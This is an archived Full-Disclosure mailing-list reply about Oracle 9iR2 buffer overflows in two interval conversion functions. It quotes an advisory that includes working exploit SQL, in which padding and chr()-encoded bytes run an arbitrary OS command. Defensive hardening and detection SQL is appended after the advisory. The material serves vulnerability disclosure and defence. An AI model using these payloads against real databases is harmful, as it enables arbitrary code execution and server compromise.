Re: [Full-Disclosure] Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow

From: Chris Anley (chris_at_ngssoftware.com)
Date: 02/05/04

    To: Cesar <cesarc56@yahoo.com>
    Date: Thu, 5 Feb 2004 13:29:45 -0800 (Pacific Standard Time)
    
    

    Hey Cesar.

    These are known bugs.

    We (NGS) found and reported them last year. As you say, Oracle has
    already fixed them and released a patch. Check out

    http://www.nextgenss.com/research.html

    ...where we posted advisories on these bugs in December, along with
    another couple in from_tz and time_zone. We've historically found a lot
    of issues in Oracle, so if you want to eliminate the stuff that's already
    fixed from your list of 60+ issues it's a good place to look; the fine
    detail isn't always available in the Oracle alerts.

         -chris.

    On Thu, 5 Feb 2004, Cesar wrote:

    > Security Advisory
    >
    > Name: Oracle Database 9ir2 Interval Conversion
    > Functions Buffer Overflow.
    > System Affected : Oracle Database 9ir2, previous
    > versions could be affected too.
    > Severity : High
    > Remote exploitable : Yes
    > Author: Cesar Cerrudo.
    > Date: 02/05/04
    > Advisory Number: CC020401
    >
    >
    > Legal Notice:
    >
    > This Advisory is Copyright (c) 2003 Cesar Cerrudo.
    > You may distribute it unmodified and for free. You may
    > NOT modify it and distribute it or distribute
    > parts of it without the author's written permission.
    > You may NOT use it for commercial intentions
    > (this means include it in vulnerabilities databases,
    > vulnerabilities scanners, any paid service,
    > etc.) without the author's written permission. You are
    > free to use Oracle details for commercial intentions.
    >
    >
    > Disclaimer:
    >
    > The information in this advisory is believed to be
    > true though it may be false.
    > The opinions expressed in this advisory are my own and
    > not of any company. The usual standard
    > disclaimer applies, especially the fact that Cesar
    > Cerrudo is not liable for any damages caused
    > by direct or indirect use of the information or
    > functionality provided by this advisory.
    > Cesar Cerrudo bears no responsibility for content or
    > misuse of this advisory or any derivatives thereof.
    >
    >
    >
    > !!!!!!!!!!!ALERT!!!!!!!!!!!:
    >
    > Oracle was contacted about these vulnerabilities, but
    > their Security Response Team is one of the worst that
    > I have dealt with; they don't care about security and
    > they don't even follow OISafety rules (Oracle is a
    > member).
    > For this reason we have only told Oracle about
    > a couple of bugs. I think I won't contact them
    > anymore,
    > or maybe I will if I get a letter from Larry Ellison
    > apologising...:).
    > Anyway, if Oracle would spend more money on security
    > than on marketing saying that their products are
    > unbreakable,
    > everything would be different. Right now Oracle
    > database server and other Oracle products are some
    > kind of backdoor.
    > These vulnerabilities are just a few of the 60+ that
    > we have identified (yes, more than 60 issues, and
    > most of these issues can be exploited by any low
    > privileged user to take complete control over the
    > database and probably the OS; also, for some of them
    > there aren't any workarounds). If you are running
    > Oracle, I recommend you start praying not to be hacked
    > and start complaining to Oracle to improve the quality
    > of
    > their products and to release patches.
    >
    > BTW: if someone from Oracle dares to say that I'm not
    > telling the truth, then I will probably release all the
    > holes'
    > information to shut their mouths.
    >
    > Some workarounds to protect your Oracle servers until
    > maybe next year, when Oracle could probably fix their
    > buggy
    > database server:
    >
    > -Check package permissions and remove PUBLIC
    > permission; set the minimal permissions
    > that fit your needs.
    > -Check Directory Object permissions and remove PUBLIC
    > permission; set the minimal permissions
    > that fit your needs; remove Directory Objects if not
    > used.
    > -Restrict users from executing PL/SQL statements
    > directly on the server.
    > -Periodically audit users' permissions on all database
    > objects.
    > -Lock users that aren't used.
    > -Change default passwords.
    > If you want automation, I really like AppDetective for
    > Oracle:
    > http://www.appsecinc.com/products/appdetective/oracle/
    >
    >
    > Overview:
    >
    > Oracle Database Server is one of the most used
    > database servers in the world. It was marketed
    > as being unbreakable, and many people think it is
    > one of the most secure database servers on
    > the market. Larry Ellison (Oracle CEO) says that
    > Oracle is used by the NSA, CIA, Russian intelligence,
    > governments, etc.
    > (www.commonwealthclub.org/archive/96/96-03ellison-qa.html),
    > so it must be really secure!!!
    > Oracle Database Server provides two functions that can
    > be used with PL/SQL to convert numbers
    > to date/time intervals; these functions have buffer
    > overflow vulnerabilities.
    >
    >
    >
    > Details:
    >
    > When either of these conversion functions is called
    > with a long string as its second
    > parameter, a buffer overflow occurs.
    >
    > To reproduce the overflow, execute the following PL/SQL:
    >
    > SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual;
    >
    > SELECT NUMTODSINTERVAL(1,'longstringhere') from dual;
    >
    >
    >
    > This vulnerability can be exploited by any Oracle
    > Database user because access to these
    > functions can't be restricted.
    > Exploitation of this vulnerability allows an attacker
    > to execute arbitrary code; it
    > can also be exploited to cause a DoS (denial of service)
    > by killing the Oracle server process. An attacker can
    > completely compromise the OS and database if Oracle is
    > running on a Windows platform, because Oracle must
    > run under the Local System account or under an
    > administrative account. If Oracle is running on *nix,
    > then only the database could be compromised, because
    > Oracle mostly runs under the oracle user, which has
    > restricted
    > permissions.
    > Important!: Exploitation of these vulnerabilities
    > becomes easy if Oracle Internet Directory has
    > been deployed, because Oracle Internet Directory
    > creates a database user called ODSCOMMON that
    > has a default password, ODSCOMMON (Unbreakable???,
    > hahaha, please take a look at this:
    >
    > http://igloo.its.unimelb.edu.au/Webmail/tips/msg00762.html).
    > This password cannot be changed,
    > so any attacker can use this user to connect to the
    > database and exploit these vulnerabilities.
    >
    >
    > Full tests on Oracle Database 9iR2 under Microsoft
    > Windows 2000 Server and Linux confirm these
    > vulnerabilities;
    > versions running on other OS platforms are believed
    > to be affected too.
    > Previous Oracle Database Server versions could be
    > affected by these vulnerabilities.
    >
    >
    >
    > Exploits:
    >
    > --these exploits should work on W2K Server and WinXp,
    > not tested on Win2003.
    > --run any command at the end of the string
    > SELECT
    > NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
    > ||
    >
    > chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1
    >
    > 48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo
    > ARE YOU SURE? >c:\Unbreakable.txt')
    >
    > FROM DUAL;
    >
    > SELECT
    > NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
    > ||
    >
    > chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1
    >
    > 48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo
    > ARE YOU SURE? >c:\Unbreakable.txt')
    >
    > FROM DUAL;
    >
    >
    >
    > Vendor Fix:
    >
    > Go to Oracle Metalink site, http://metalink.oracle.com
    >
    >
    > Vendor Contact:
    >
    > Oracle was contacted and they released a fix without
    > telling me nor the public anything and without issuing
    > an alert.
    >
    >
    >
    >

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
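The workaround list in the quoted advisory (remove PUBLIC grants on packages and directory objects, lock unused accounts, change default passwords, audit privileges) can be driven from the data dictionary. The following SQL is an added example written for this archive page; it is not code from either poster, from NGS or from Oracle. It assumes a DBA session on an Oracle 9i-era database and uses only standard dictionary views (DBA_TAB_PRIVS, DBA_OBJECTS, DBA_DIRECTORIES, DBA_USERS, V$SQL). Object names such as some_package, some_dir and some_user are placeholders for whatever the audit queries return in your environment.

```sql
-- 1. Packages that PUBLIC may execute. Each row is a candidate for REVOKE
--    once you have confirmed nothing in the application depends on it.
SELECT p.owner, p.table_name AS package_name, p.privilege
  FROM dba_tab_privs p
  JOIN dba_objects  o
    ON o.owner = p.owner
   AND o.object_name = p.table_name
 WHERE p.grantee     = 'PUBLIC'
   AND p.privilege   = 'EXECUTE'
   AND o.object_type = 'PACKAGE'
 ORDER BY p.owner, p.table_name;

-- Placeholder: revoke one such grant after review.
REVOKE EXECUTE ON sys.some_package FROM PUBLIC;

-- 2. Directory objects and every grantee that can read or write them.
--    A directory with no application user is a candidate for DROP.
SELECT d.directory_name, d.directory_path, p.grantee, p.privilege
  FROM dba_directories d
  LEFT JOIN dba_tab_privs p
    ON p.table_name = d.directory_name
   AND p.owner      = d.owner
 ORDER BY d.directory_name, p.grantee;

-- Placeholders: tighten or remove directories identified above.
REVOKE READ, WRITE ON DIRECTORY some_dir FROM PUBLIC;
DROP DIRECTORY unused_dir;

-- 3. Open accounts, oldest first, to review against the list of accounts
--    the application actually needs; lock the rest.
SELECT username, account_status, created
  FROM dba_users
 WHERE account_status = 'OPEN'
 ORDER BY created;

-- Placeholder: lock an account nobody uses.
ALTER USER some_user ACCOUNT LOCK;

-- 4. Replace a default password (quote the new value; choose a strong one).
ALTER USER some_user IDENTIFIED BY "<new strong password>";

-- 5. Record who executes stored procedures, so calls to the affected
--    functions from unexpected users show up in the audit trail.
AUDIT EXECUTE PROCEDURE BY ACCESS;

-- 6. Quick sweep of the shared SQL area for statements that call the two
--    interval functions; long literal arguments are the pattern the
--    advisory describes. V$SQL.SQL_TEXT holds only the first 1000 chars,
--    so treat this as a triage aid, not as a complete record.
SELECT u.username, s.sql_text
  FROM v$sql    s
  JOIN dba_users u
    ON u.user_id = s.parsing_user_id
 WHERE UPPER(s.sql_text) LIKE '%NUMTOYMINTERVAL%'
    OR UPPER(s.sql_text) LIKE '%NUMTODSINTERVAL%'
 ORDER BY u.username;
```

Run the SELECTs first and review their output; the REVOKE, DROP and ALTER statements are written against placeholder names and should be applied only to the objects and accounts the audit actually identifies. Applying the vendor patch remains the fix; these controls reduce who can reach the vulnerable code and make attempts visible in the meantime.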

